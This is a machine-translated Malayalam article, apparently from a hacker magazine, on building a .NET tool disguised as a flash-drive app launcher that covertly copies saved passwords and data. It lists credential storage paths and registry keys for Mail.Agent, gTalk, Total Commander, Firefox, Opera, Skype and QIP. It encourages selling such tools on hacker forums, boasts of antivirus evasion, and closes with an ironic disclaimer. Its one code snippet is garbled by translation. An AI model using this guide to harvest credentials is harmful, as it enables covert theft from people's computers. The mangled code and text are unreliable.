    ആപ്ലിക്കേഷനുകളുടെ പോർട്ടബിൾ പതിപ്പുകൾ എന്ന് വിളിക്കപ്പെടുന്നവ ഇപ്പോൾ വളരെ ജനപ്രിയമായിത്തീർന്നതായി നിങ്ങൾക്കറിയാം, അതായത്, ഒരു ഫ്ലാഷ് ഡ്രൈവിൽ നിന്ന് നേരിട്ട് പ്രവർത്തിക്കാൻ കഴിയുന്ന പ്രോഗ്രാമുകൾ. ഇതിൽ കളിക്കുന്നതാണ് നല്ലത്. ഉചിതമായ ശൈലിയിൽ പ്രോഗ്രാം രൂപകൽപ്പന ചെയ്യുക, കൂടാതെ, ഏതെങ്കിലും പ്രോഗ്രാമുകൾ സമാരംഭിക്കുന്നതിന് രൂപകൽപ്പന ചെയ്‌തിരിക്കുന്ന കുറച്ച് ബട്ടണുകൾ ഇടുക. എൻ്റെ ഡിസൈൻ ഓപ്ഷൻ ചിത്രത്തിൽ കാണിച്ചിരിക്കുന്നു.

    നമ്മൾ എങ്ങനെയാണ് കൊള്ളയടിക്കാൻ പോകുന്നത്?

    ഇവിടെ സൂപ്പർ-ഹാക്കിംഗ് പ്രവർത്തനങ്ങൾ നടത്തേണ്ട ആവശ്യമില്ലെന്ന് ഞാൻ ഉടൻ തന്നെ പറയും. മിക്ക പ്രോഗ്രാമുകളും ഡോക്യുമെൻ്റുകളിലും ക്രമീകരണങ്ങളിലും\User\Application Data\%ProgramName% ഫോൾഡറിലോ രജിസ്ട്രിയിലോ വ്യക്തിഗത ഡാറ്റ സംഭരിക്കുന്നു. പ്രോഗ്രാമിൻ്റെ പേര് ഏതെങ്കിലും പ്രോഗ്രാമിനെ അർത്ഥമാക്കുന്നു. നിങ്ങൾ ആദ്യ ഓപ്ഷനെ അഭിമുഖീകരിക്കുകയാണെങ്കിൽ, നിങ്ങൾ ഇതിനകം പരിചിതമായ xDirectory ക്ലാസ് ഉപയോഗിക്കേണ്ടതുണ്ട് (അല്ലെങ്കിൽ ഫയലുകൾക്കൊപ്പം പ്രവർത്തിക്കുന്നതിനുള്ള സ്റ്റാൻഡേർഡ് രീതികൾ) നിങ്ങൾക്ക് ആവശ്യമുള്ളതെല്ലാം പകർത്താൻ ഇത് ഉപയോഗിക്കുക. രണ്ടാമത്തെ സാഹചര്യത്തിൽ, നിങ്ങൾ രജിസ്ട്രിയിൽ പ്രവർത്തിക്കേണ്ടതുണ്ട്. ഫയലുകൾ പകർത്തുന്നതിനുള്ള ഒരു ഉദാഹരണം ഞാൻ നൽകില്ല (ഞങ്ങൾ ഇത് ഇതിനകം നോക്കിയിട്ടുണ്ട്), എന്നാൽ .NET ടൂളുകൾ ഉപയോഗിച്ച് രജിസ്ട്രിയുമായി എങ്ങനെ ഇടപെടാമെന്ന് ഞാൻ കാണിച്ചുതരാം (TC ഫോൾഡറിലേക്കുള്ള പാത നിർണ്ണയിക്കുന്നതിനുള്ള ഉദാഹരണം ഉപയോഗിച്ച്):

    RegistryKey readKey = Registry.CurrentUser.OpenSubKey("സോഫ്റ്റ്‌വെയർ\\Ghisler\\Total Commander");

    സ്ട്രിംഗ് കീ = (സ്ട്രിംഗ്) readKey.GetValue("InstallDir");

    അത്രയേയുള്ളൂ. കൂടുതൽ കോഡ് ഉണ്ടാകില്ല. വിലപ്പെട്ട വിവരങ്ങളുള്ള ഫയലുകൾ മോഷ്ടിക്കാൻ ഈ അറിവ് മതിയാകും. ചുമതല അൽപ്പം എളുപ്പമാക്കുന്നതിന്, ഞാൻ ഏറ്റവും ജനപ്രിയമായ പ്രോഗ്രാമുകളുടെ ഒരു ലിസ്റ്റ് തയ്യാറാക്കുകയും അവ സംരക്ഷിച്ച ഉപയോക്തൃ ഡാറ്റ സംഭരിക്കുന്ന എല്ലാ വഴികളും വിവരിക്കുകയും ചെയ്തു.

    മെയിൽ.ഏജൻറ്

  • ചരിത്രം. MA ഉപയോക്താവിൻ്റെ മുഴുവൻ കത്തിടപാട് ചരിത്രവും പ്രമാണങ്ങളിലും ക്രമീകരണത്തിലും\%User%\Application Data\Mra\base . അടിസ്ഥാന ഫോൾഡറിൽ ഒരു ഫയൽ ഉണ്ട് mra.dbs. വാസ്തവത്തിൽ ഇത് ചരിത്ര പ്രമാണമാണ്.
  • കോൺടാക്റ്റ്-ലിസ്റ്റ്. എംആർഎ\%ഉപയോക്തൃ അക്കൗണ്ട്%\clist5.txt ഫോൾഡറിലാണ് കോൺടാക്റ്റുകളുടെ ലിസ്റ്റ് സ്ഥിതി ചെയ്യുന്നത്. mail.agent-ൽ പ്രവർത്തിക്കുന്ന നിരവധി ഉപയോക്താക്കൾ ഉണ്ടായിരിക്കാമെന്നത് ശ്രദ്ധിക്കുക (അല്ലെങ്കിൽ ഒരു ഉപയോക്താവിന് നിരവധി അക്കൗണ്ടുകൾ ഉണ്ടായിരിക്കാം). അതിനാൽ, "@" ചിഹ്നം അടങ്ങിയ എല്ലാ ഫോൾഡറുകളും അവയുടെ പേരുകളിൽ പകർത്തുക എന്നതാണ് ഏറ്റവും മികച്ച കാര്യം.
  • രഹസ്യവാക്ക്. ഉപയോക്തൃ അക്കൗണ്ടിനായുള്ള പാസ്‌വേഡ് (കൂടുതൽ കൃത്യമായി പറഞ്ഞാൽ, അതിൻ്റെ ഹാഷ്) രജിസ്ട്രിയിൽ പാതയിൽ സ്ഥിതിചെയ്യുന്നു - HKCU\Software\Mail.RU\Agent\magent_logins2\%Account% ####പാസ്‌വേഡ് പാരാമീറ്ററിൽ.
  • gTalk

    കമ്പനി ഗൂഗിൾഒരു ഗബ്ബർ ക്ലയൻ്റ് ഉൾപ്പെടെ സൗകര്യപ്രദവും പ്രവർത്തനപരവുമായ ഉൽപ്പന്നങ്ങൾ സൃഷ്ടിക്കുന്നു - gTalk. ഇന്ന് gTalkഇതുവരെ വളരെ ജനപ്രിയമായിട്ടില്ല. ഓരോ രണ്ടാമത്തെ പിസിയിലും ഇത് ഇൻസ്റ്റാൾ ചെയ്തിട്ടില്ല, പക്ഷേ ചിലപ്പോൾ ഇത് ഇപ്പോഴും സംഭവിക്കുന്നു, വിഷയത്തിൽ ആയിരിക്കണമെങ്കിൽ, ഈ മെസഞ്ചറിൽ നിന്ന് പാസ്‌വേഡുകൾ ലഭിക്കാൻ ഞങ്ങളുടെ പ്രോഗ്രാമിനെ ഉടനടി പഠിപ്പിക്കുന്നതാണ് നല്ലത്. രജിസ്ട്രിയിലെ എല്ലാ അക്കൗണ്ടുകൾക്കുമുള്ള പാസ്‌വേഡുകൾ gTalk സംഭരിക്കുന്നു - HHEY_CURRENT_USER\Software\Google\Google Talk\Accounts. ഇതുവരെ ലോഗിൻ ചെയ്തിട്ടുള്ള എല്ലാ അക്കൗണ്ടുകളും ഈ ത്രെഡ് ലിസ്റ്റുചെയ്യുന്നു gTalk. അക്കൗണ്ട് പാസ്‌വേഡുകൾ pw സ്ട്രിംഗ് പാരാമീറ്ററിൽ എഴുതിയിരിക്കുന്നു.

    ആകെ കമാൻഡർ

    ആകെ കമാൻഡർഇതുവരെയുള്ള ഏറ്റവും ജനപ്രിയമായ ഫയൽ മാനേജർ ആണ്. പ്രോഗ്രാമിൽ ഏകദേശം ഒരു വാഗണും ഒരു ചെറിയ വണ്ടിയും അടങ്ങിയിരിക്കുന്നു (അധിക പ്ലഗിനുകൾ ഉപയോഗിച്ച് അതേ നമ്പർ ഇതിലേക്ക് ചേർക്കാവുന്നതാണ്). ബിൽറ്റ്-ഇൻ FTP ക്ലയൻ്റിലാണ് ഞങ്ങൾക്ക് താൽപ്പര്യമുള്ളത്. പലരും ഇത് ഉപയോഗിക്കുന്നു, കൂടാതെ പാസ്‌വേഡുകൾ തീർച്ചയായും സംരക്ഷിക്കപ്പെടുന്നു.

    TC, മറ്റ് പല പ്രോഗ്രാമുകളിൽ നിന്നും വ്യത്യസ്തമായി, രജിസ്ട്രിയിൽ പാസ്വേഡുകൾ സംഭരിക്കുന്നില്ല, എന്നാൽ നല്ല പഴയ ini ഫയലുകൾ ഉപയോഗിക്കുന്നു. പാസ്‌വേഡുകളും സെർവറുകളിലേക്ക് ബന്ധിപ്പിക്കുന്നതിന് ആവശ്യമായ എല്ലാ ഡാറ്റയും (ip, പോർട്ട്, ഉപയോക്തൃനാമം മുതലായവ) ആകെ കമാൻഡർഒരു ഫയലിൽ സംഭരിക്കുന്നു wcx_ftp.ini, പ്രോഗ്രാം ഫോൾഡറിൽ നിഷ്കളങ്കമായി സ്ഥിതിചെയ്യുന്നു. ഇത് ഇൻസ്റ്റാൾ ചെയ്ത ഡയറക്ടറിയിലേക്കുള്ള പാത ആകെ കമാൻഡർ, രജിസ്ട്രിയിൽ നിന്ന് നിങ്ങൾക്ക് കണ്ടെത്താനാകും. HKEY_CURRENT_USER\Software\Ghisler\Total Commander ബ്രാഞ്ച് നോക്കുക.

    ഫയർഫോക്സ്

    ഇന്ന്, ഒരു ബ്രൗസർ വെബ് യാത്രയ്ക്കുള്ള ഒരു പ്രോഗ്രാം മാത്രമല്ല, വിവിധ കഴിവുകൾക്ക് പുറമേ, ധാരാളം രഹസ്യാത്മക വിവരങ്ങൾ സംഭരിക്കുന്ന മൊത്തത്തിൽ. ഇതിൻ്റെ ഒരു സാധാരണ ഉദാഹരണം വെബ് ഫോമുകളാണ്. ആധുനിക സൈറ്റുകളിൽ 99% രജിസ്ട്രേഷൻ ആവശ്യമാണ്. ഓരോ സൈറ്റിനുമുള്ള ലോഗിൻ/പാസ്‌വേഡ് കോമ്പിനേഷൻ ഓർമ്മിക്കുകയും നിരന്തരം മനസ്സിൽ സൂക്ഷിക്കുകയും ചെയ്യുന്നത് ഒരു യാഥാർത്ഥ്യബോധമില്ലാത്ത ജോലിയാണ്, പ്രത്യേകിച്ചും നിങ്ങൾ ഒരു വിപുലമായ ഉപയോക്താവാണെങ്കിൽ ഇൻ്റർനെറ്റ് സർഫിംഗ് Odnoklassniki, VKontakte എന്നിവയിൽ മാത്രം പരിമിതപ്പെടുന്നില്ല.

    ഡവലപ്പർമാർ ഉപയോക്താക്കൾക്ക് ജീവിതം എളുപ്പമാക്കുകയും പ്രോഗ്രാമുകളിലേക്ക് "പാസ്‌വേഡ് നിലവറകൾ" എന്ന് വിളിക്കപ്പെടുകയും ചെയ്യുന്നു. ഞാൻ രജിസ്റ്റർ ചെയ്തു, എൻ്റെ അക്കൗണ്ട് ഉപയോഗിച്ച് ലോഗിൻ ചെയ്തു, എൻ്റെ ക്രെഡൻഷ്യലുകൾ ഓർമ്മിക്കാൻ ബ്രൗസറിനോട് പറഞ്ഞു - മറന്നു. അടുത്ത തവണ നിങ്ങൾ സന്ദർശിക്കുമ്പോൾ, നിങ്ങൾ ചെയ്യേണ്ടത് രണ്ട് ക്ലിക്കുകൾ ചെയ്യുക, നിങ്ങൾ ഇതിനകം സൈറ്റിൽ ഉണ്ട്. ബ്രൗസർ പാസ്‌വേഡുകൾ സംരക്ഷിക്കുന്നതിനാൽ, അതിൻ്റെ മുഴുവൻ ഡാറ്റാബേസും മോഷ്ടിക്കാൻ ഞങ്ങൾക്ക് അവസരമുണ്ടെന്ന് അർത്ഥമാക്കുന്നു.

  • sessionstore.js - ഫയലിൽ സംരക്ഷിച്ച എല്ലാ സെഷനുകളും അടങ്ങിയിരിക്കുന്നു.
  • signons3.txt - എൻക്രിപ്റ്റ് ചെയ്ത പാസ്‌വേഡുകൾ (FF-ൻ്റെ മൂന്നാം പതിപ്പിന്).
  • signons.sqlite - എല്ലാ എൻക്രിപ്റ്റ് ചെയ്ത പാസ്‌വേഡുകളും അടങ്ങുന്ന SQLite ഡാറ്റാബേസ്.
  • key3.db എന്നത് സർട്ടിഫിക്കറ്റുകൾക്കുള്ള കീകൾ അടങ്ങിയ ഒരു ഡാറ്റാബേസാണ്.
  • ഈ ഫയലുകളെല്ലാം ഇതിനകം പരിചിതമായ ഡോക്യുമെൻ്റിലും ക്രമീകരണങ്ങളിലും\%UserName%\Application Data\Mozilla\FireFox\Profiles\%Profile Name% എന്നതിലാണ് സ്ഥിതി ചെയ്യുന്നത്.

    ഓപ്പറ

    ഓപ്പറ- റഷ്യൻ ഉപയോക്താക്കൾക്കിടയിൽ വളരെ പ്രചാരമുള്ള ഒരു ബ്രൗസർ. സ്വാഭാവികമായും നമുക്ക് അത് അവഗണിക്കാനാവില്ല. അതിനാൽ, ഓപ്പറയുടെ അവസ്ഥ ഏകദേശം ഫയർഫോക്സിന് സമാനമാണ്. ബ്രൗസറിൽ സംരക്ഷിച്ചിരിക്കുന്ന എല്ലാ പാസ്‌വേഡുകളും ഡോക്യുമെൻ്റിലും ക്രമീകരണങ്ങളിലും\%UserName%\Application Data\Opera\profile-ൽ wand.dat ഫയലിൽ സംഭരിച്ചിരിക്കുന്നു. ഓപ്പറ കണ്ടെത്തുമ്പോൾ, ഞങ്ങൾ അതേ രീതിയിൽ പ്രവർത്തിക്കുമെന്ന് ഇത് മാറുന്നു ഫയർഫോക്സ്.

    സ്കൈപ്പ്

    സ്കൈപ്പിൻ്റെ ജനപ്രീതി അനുദിനം വളരുകയാണ്. പലരും ഇത് കോളുകൾ ചെയ്യുന്നതിനുള്ള ഒരു മാർഗമായിട്ടല്ല, മറിച്ച് നിസ്സാരവും സൗകര്യപ്രദവുമായ ചാറ്റിനായി ഉപയോഗിക്കുന്നു. എല്ലാ രഹസ്യ ഡാറ്റയും, നിങ്ങൾ പ്രതീക്ഷിക്കുന്നതുപോലെ, ഉപയോക്തൃ പ്രൊഫൈലിൽ (ഓപ്പറ അല്ലെങ്കിൽ എഫ്എഫ് സംഭരിക്കുന്ന അതേ സ്ഥലത്ത്) സ്ഥിതിചെയ്യുന്നു. അവയെ "സ്വകാര്യവൽക്കരിക്കാൻ", നിങ്ങൾ പ്രമാണം, ക്രമീകരണങ്ങൾ\%ഉപയോക്തൃനാമം%\അപ്ലിക്കേഷൻ ഡാറ്റ\സ്കൈപ്പ്\ എന്നിവയിൽ നിന്ന് ഉപയോക്തൃ പ്രൊഫൈൽ പകർത്തുകയും രജിസ്ട്രി ബ്രാഞ്ച് കയറ്റുമതി ചെയ്യുകയും വേണം - HKEY_CURRENT_USER\Software\Skype\ProtectedStorage.

    ക്യുഐപി

    മുമ്പ് വിവരിച്ച മിക്ക പ്രോഗ്രാമുകളെയും പോലെ, QIP സംരക്ഷിച്ച എല്ലാ പാസ്‌വേഡുകളും ആപ്ലിക്കേഷൻ ഡാറ്റ\qip-ൽ സംഭരിക്കുന്നു.

    പകർത്തൽ പൂർത്തിയായി

    .NET സാങ്കേതികവിദ്യ ഞങ്ങളുടെ ചുമതല വളരെ ലളിതമാക്കി, അതിൻ്റെ ഫലമായി എല്ലാ കോഡിംഗും കുറച്ച് രീതികൾ വിളിക്കുന്നതിലേക്ക് ചുരുക്കി. തീർച്ചയായും, ഇത് രസകരമല്ലെന്നും WinAPI അല്ലെങ്കിൽ ASM-ൽ അത്തരം കാര്യങ്ങൾ എഴുതുന്നത് കൂടുതൽ കാര്യക്ഷമമാണെന്നും നിങ്ങൾക്ക് പറയാൻ കഴിയും, എന്നാൽ WinAPI യിലും പ്രത്യേകിച്ച് അസ്മയിലും. അത്തരം ഒരു പ്രോഗ്രാം എഴുതുന്നത് ഇതുപോലെയാണ്.

    മറക്കരുത്, പല ഉപയോക്താക്കളും "എൻ്റെ പ്രമാണങ്ങൾ" ഫോൾഡറിൽ രഹസ്യ വിവരങ്ങൾ സംഭരിക്കുന്നു. കുറഞ്ഞത്, രസകരമായ പ്രവർത്തന പ്രമാണങ്ങളും ചിലപ്പോൾ പാസ്വേഡുകളുള്ള മുഴുവൻ ഫയലുകളും ഉണ്ടായിരിക്കാം. ഒരു സമയത്ത് (എൻ്റെ മുൻ ജോലിയിൽ) ഞാൻ ഒരു അക്കൗണ്ടൻ്റിൻ്റെ കമ്പ്യൂട്ടറിൽ ബാങ്ക് ക്ലയൻ്റുകളുടെ പാസ്‌വേഡുകളുള്ള ഒരു ഫോർമാറ്റ് ചെയ്ത ഫയൽ കണ്ടെത്തി.

    ഒരു യഥാർത്ഥ സുഹൃത്ത് എന്ന നിലയിൽ, ഈ ആളുകളെയെല്ലാം അവരുടെ രഹസ്യാത്മക വിവരങ്ങളുടെ ബാക്കപ്പ് ഉപയോഗിച്ച് നിങ്ങൾ സഹായിക്കണം.

    പല ഹാക്കർ ഫോറങ്ങളിലും ഇത്തരത്തിലുള്ള സോഫ്‌റ്റ്‌വെയർ വിൽപ്പനയ്‌ക്കായി നിരവധി പരസ്യങ്ങളുണ്ട്. വിലകൾ വ്യത്യാസപ്പെടുന്നു - 10$ മുതൽ 100$ വരെ. ലേഖനത്തിൽ ചർച്ച ചെയ്ത ഉദാഹരണങ്ങൾ അന്തിമമാക്കുന്നതിലൂടെ, കാവിയാർ ഉപയോഗിച്ച് കറുത്ത റൊട്ടിയുടെ പുറംതോട് നിങ്ങൾക്ക് പണം സമ്പാദിക്കാം. ഞാൻ ആവർത്തിക്കുന്നു, പ്രധാന കാര്യം വിഷയത്തെ ക്രിയാത്മകമായി സമീപിക്കുക എന്നതാണ്, എല്ലാം തീർച്ചയായും പ്രവർത്തിക്കും. വീണ്ടും, ഇത് ആൻ്റിവൈറസുകളാൽ കണ്ടെത്തിയില്ല;).

    മുന്നറിയിപ്പ്!

    ഫ്ലാഷ് ഡ്രൈവുകളുടെ ഉള്ളടക്കങ്ങൾ ഒരു ഡിസ്കിലേക്ക് സമയബന്ധിതമായി ബാക്കപ്പുചെയ്യുന്നതിനും ഒരു ഫ്ലാഷ് ഡ്രൈവിലേക്ക് പാസ്വേഡുകൾ ബാക്കപ്പ് ചെയ്യുന്നതിനും ഞങ്ങൾ ഈ പ്രോഗ്രാം പ്രത്യേകമായി ഉപയോഗിക്കുന്നു. നിങ്ങൾ എന്താണ് ചിന്തിച്ചത്? ഇത്തരം സോഫ്റ്റ്‌വെയറിൻ്റെ നിയമവിരുദ്ധമായ ഉപയോഗം ശിക്ഷാർഹമാണ്!